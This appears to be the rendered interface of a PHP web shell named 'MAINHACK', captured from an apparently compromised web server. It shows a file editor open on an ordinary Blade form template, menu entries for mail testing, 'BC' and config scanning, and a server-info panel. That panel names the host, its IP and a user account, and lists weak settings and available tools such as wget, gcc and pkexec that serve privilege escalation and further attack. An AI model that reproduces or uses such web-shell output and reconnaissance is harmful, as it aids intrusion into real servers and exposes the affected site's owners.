[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: customfields2.blade.php
@foreach($fields as $field) <div class="form-group row"> <label class="col-sm-12 col-lg-3 text-left control-label col-form-label {{ runtimeCustomFieldsRequiredCSS($field->customfields_required) }}"> {{ $field->customfields_title }}{{ runtimeCustomFieldsRequiredAsterix($field->customfields_required) }}</label> <div class="col-sm-12 col-lg-9"> <!--text field--> @if($field->customfields_datatype =='text') <input type="text" class="form-control form-control-sm" id="{{ $field->customfields_name }}" name="{{ $field->customfields_name }}" value="{{ $field->current_value ?? ''}}"> @endif <!--textbox field--> @if($field->customfields_datatype =='paragraph') <textarea class="form-control form-control-sm tinymce-textarea" rows="5" name="{{ $field->customfields_name }}" id="{{ $field->customfields_name }}">{{ $field->current_value ?? ''}}</textarea> @endif <!--numbers--> @if($field->customfields_datatype =='number' || $field->customfields_datatype =='decimal') <input type="number" class="form-control form-control-sm" id="{{ $field->customfields_name }}" name="{{ $field->customfields_name }}" value="{{ $field->current_value ?? ''}}"> @endif <!--date field--> @if($field->customfields_datatype =='date') <input type="text" class="form-control form-control-sm pickadate" name="{{ $field->customfields_name }}" autocomplete="off"> <input class="mysql-date" type="hidden" name="{{ $field->customfields_name }}" id="{{ $field->customfields_name }}" value="{{ $field->current_value ?? ''}}"> @endif <!--checkbox field--> @if($field->customfields_datatype =='dropdown') <select class="select2-basic form-control form-control-sm select2-preselected" id="{{ $field->customfields_name }}" name="{{ $field->customfields_name }}" data-preselected="{{ $field->current_value ?? ''}}"> {!! runtimeCustomFieldsJsonLists($field->customfields_datapayload) !!} </select> @endif <!--dropdown field--> @if($field->customfields_datatype =='checkbox') <input type="checkbox" id="{{ $field->customfields_name }}" name="customfield_{{ $field->field_id }}" class="filled-in chk-col-light-blue" {{ runtimePrechecked($field->current_value ?? '') }}> <label class="p-l-0" for="{{ $field->customfields_name }}"></label> @endif </div> </div> @endforeach
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002